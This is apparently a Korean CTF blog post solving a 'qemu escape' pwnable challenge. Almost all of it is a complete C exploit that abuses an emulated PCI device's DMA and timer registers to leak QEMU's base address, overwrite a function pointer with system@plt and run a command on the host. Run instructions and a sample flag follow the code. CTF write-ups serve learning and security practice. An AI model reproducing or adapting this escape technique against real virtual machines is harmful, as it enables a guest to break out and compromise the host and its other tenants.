Category : pwnable
Summary : qemu escape
Exploit
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <time.h>
#define SRC_LO 0x80
#define SRC_HI 0x84
#define DST_LO 0x88
#define DST_HI 0x8c
#define CNT 0x90
#define TIMER 0x98
#define TIMER_READ 0x1
#define TIMER_WRITE 0x3
#define TIMER_ENC 0x4
#define MAP_SIZE 0x1000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
int pagemap_fd;
char *mmio;
///////// http://www.phrack.org/papers/vm-escape-qemu-case-study.html //////////
uint32_t page_offset(uint32_t addr)
{
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(pagemap_fd, offset, SEEK_SET);
read(pagemap_fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
if(gfn == -1){
write(1, "convert fail\n", 13);
exit(-1);
}
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
/////////////////////////////////////////////////////////////////////////////////
uint64_t hitb_read(uint64_t hwaddr){
uint64_t out;
out = *((uint32_t *)(&mmio[hwaddr]));
return out;
}
void hitb_write(uint64_t hwaddr, uint64_t value, uint32_t length){
switch(length){
case 1:
*((uint8_t *)(&mmio[hwaddr])) = (uint8_t)value;
break;
case 2:
*((uint16_t *)(&mmio[hwaddr])) = (uint16_t)value;
break;
case 4:
*((uint32_t *)(&mmio[hwaddr])) = (uint32_t)value;
break;
case 8:
default:
*((uint64_t *)(&mmio[hwaddr])) = (uint64_t)value;
}
}
void memset(void *dest, int c, size_t count){
int i;
for(i=0;i<count;i++) *(char *)dest++ = (char)c;
}
void memcpy(void *dest, void *src, size_t count){
int i;
for(i=0;i<count;i++) *(char *)dest++ = *(char *)src++;
}
int main()
{
struct timespec ts;
uint64_t pie_base, system_plt, free_got, data;
char buf[0x100];
fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR|O_SYNC);
mmio = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
if(fd < 0 || (int64_t)mmio < 0 || pagemap_fd < 0){
write(1, "fail\n", 5);
exit(-1);
}
memset(buf, 0x90, 0x100);
ts.tv_sec = 3;
ts.tv_nsec = 0;
/* leak pie base */
hitb_write(SRC_LO, 0x41000, 8);
hitb_write(DST_LO, gva_to_gpa(buf), 8);
hitb_write(CNT, 8, 8);
hitb_write(TIMER, TIMER_WRITE, 8);
nanosleep(&ts, NULL);
pie_base = *((uint64_t *)buf) - 0x283dd0;
system_plt = pie_base + 0x1fdb18;
/* hitbState->enc = system@plt */
hitb_write(SRC_LO, (gva_to_gpa(&system_plt)), 8);
hitb_write(DST_LO, 0x41000, 8);
hitb_write(CNT, 8, 8);
hitb_write(TIMER, TIMER_READ, 8);
nanosleep(&ts, NULL);
/* hitbState->dma_buf[0:9] = "cat flag\x00"*/
memcpy(buf, "cat flag", 9);
hitb_write(SRC_LO, (gva_to_gpa(buf)), 8);
hitb_write(DST_LO, 0x40000, 8);
hitb_write(CNT, 9, 8);
hitb_write(TIMER, TIMER_READ, 8);
nanosleep(&ts, NULL);
/* hitbState->enc("cat flag", hitbState->dma.cnt) */
hitb_write(SRC_LO, 0x40000, 8);
hitb_write(DST_LO, 0xcafebabedeafbeef, 8);
hitb_write(CNT, 9, 8);
hitb_write(TIMER, TIMER_WRITE | TIMER_ENC, 8);
nanosleep(&ts, NULL);
/* flag! */
close(fd);
close(pagemap_fd);
munmap(mmio, MAP_SIZE);
exit(0);
}
# cat pay | base64 -d > exploit
# chmod +x exploit
# ./exploit
CTF{THIS_IS_FLAG}#
'CTF > 2017' 카테고리의 다른 글
| 0CTF 2017 FINAL - VM Escape (0) | 2018.12.03 |
|---|---|
| XCTF FINAL 2017 - xmail (0) | 2018.10.06 |
| XCTF FINAL 2017 - network (0) | 2018.10.06 |
| CODEGATE 2017 QUAL - js_world (0) | 2018.09.26 |
| CODEGATE 2017 FINAL - petshop (0) | 2017.06.04 |